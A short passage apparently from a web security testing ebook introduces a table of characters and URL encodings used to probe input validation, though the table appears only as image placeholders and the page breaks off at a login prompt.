Additionally, Table 6-5 lists several characters and their URL encoding that quite often represent a malicious payload or otherwise represent some attempt to generate an error or execute a command. These characters alone do not necessarily exploit the application, nor are they always invalid; however, where these characters are not expected by the application, then a little patience can often turn them into an exploit.

Image

Table 6-5 Popular Characters to Test Input Validation

REFERENCES & FURTHER READING

Image

Image

Image

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
18.119.135.81